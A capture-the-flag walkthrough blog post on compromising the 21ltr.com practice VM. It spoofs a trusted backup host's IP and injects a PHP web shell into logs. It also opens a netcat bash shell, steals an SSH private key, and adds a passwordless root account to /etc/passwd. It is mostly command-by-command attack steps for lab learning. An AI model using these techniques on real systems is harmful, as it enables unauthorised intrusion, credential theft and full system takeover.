After a long break, the #HackOnTuesday episodes are back! In today’s episode we will hack the 21ltr.com CTF VM by first identifying the vulnerable trust relationship between the main VM and a backup system use by the VM, and by then impersonating the backup system in order to exploit the trust relationship and hack the 21ltr.com VM.

Tools, Scripts, and Exploits

Steps

  • Identify all the host in the target network
    • nmap –sn 192.168.2.0/24
  • Identify the services listening on the server.
    • nmap –v –Pn –sT 192.168.2.120 –p-
    • nmap –sV 192.168.2.120 –p 21, 22, 80
  • Look for any vulnerable Web application
    • Open Firefox and go to http://192.168.2.120/
    • Open a new terminal and run dirbuster
      • cd 21ltr
      • clear
      • dirbuster   # Use the wordlist at /usr/share/wordlists/directory-list-2.3-medium.txt
    • View source code on Firefox.
      • Hidden in the HTML source code there is a username and password!!
  • Test whether the found credentials can be used to connect to either SSH or FTP.
    • ssh logs@192.168.2.120   # type the password
      • Login failed
    • ftp 192.168.2.120 # type username (e.g. logs) and password
      • Login successful
  • Look for any interesting file in the FTP server.
    • ls
    • lcd /root/21ltr
    • get backup_log.php
    • quit
    • cat backup_log.php
      • Take note of the IP mentioned in the script.
  • Find the correct path to backup_log.php
    • Go to http://192.168.2.120/backup_log.php   # Page not found!
    • Go to http://192.168.2.120/logs/backup_log.php   # Bingo!
  • Change your IP to the one found in the backup_log.php script and look if there is any way to inject something in the logs.
    • ifconfig eth0 down
    • ifconfig eth0 192.168.2.240/24
    • ifconfig eth0 up
    • wireshark& # set the filter to ip.addr == 192.168.2.120
      • Apparently, every 5-10 minutes there is a connection attempt on port 10000.
  • Learn more about the connection attempt on port 10000
    • nc -lvp 10000 > out.bin
    • file out.bin
    • mv out.bin out.gz
    • gunzip out.gz
    • file out
    • tar xvf out
    • ls –lFh
    • cd media/backup
    • tar xzvf pxelinux.cfg.tar.gz
  • No interesting information seems to be contained in the pxelinux.cfg.tar.gz archive. However, after re-running nmap, I saw a new open port: port 10001. This port seemed to open only for a short period of time right after the backup archive is sent to us.
  • Analyze the service on port 10001
    • nc -nlvp 10000 > data.tar.gz && nc -nv 192.168.2.120 10001
    • type ? help
    • Go to Firefox and refresh. Bingo! We have a way to inject something in the logs.
  • Inject a PHP shell in the logs
    • type <?php echo exec($_GET[“cmd”]);?>
    • Go to ?cmd=whereis nc
    • Go to ?cmd=whereis bash
    • Go to ?cmd=nc -nlvp 4444 -e /bin/bash
    • Open a new terminal and type nc -nv 192.168.2.120 44444
  • Look for sensitive data
    • cat /etc/passwd
    • ls /home/jgreen
    • ls /home/hbeale
    • ls /tmp
    • cd /tmp
    • tar tvf backup.tar.gz # most likely the file we got from the server
    • ls /media
    • ls /media/backup # same file
    • cd /media/USB_1
    • ls –lFh
    • cd Stuff
    • ls -lFh
    • cd Keys
    • ls -lFh
    • cat id_rsa   # Private key but don’t know from who. Maybe root, maybe jgreen, or maybe hbeale.
  • Use the private key to connect to the system.
    • Copy private key to a local file called key.
    • chmod 600 key
    • ssh -i key root@192.168.2.120   # Login failed
    • ssh -i key hbeale@192.168.2.120   # Login successful
  • Escalate to root
    • List the allowed (and forbidden) commands for the invoking user.
      • sudo -l
    • Add an account with root priviledges
      • sudo /usr/bin/cat >> /etc/passwd # Add gianni::0:0::/root:/bin/bash and then press enter and CTRL+C
    • su gianni
  • Game Over!

 

Leave a Reply

Your email address will not be published. Required fields are marked *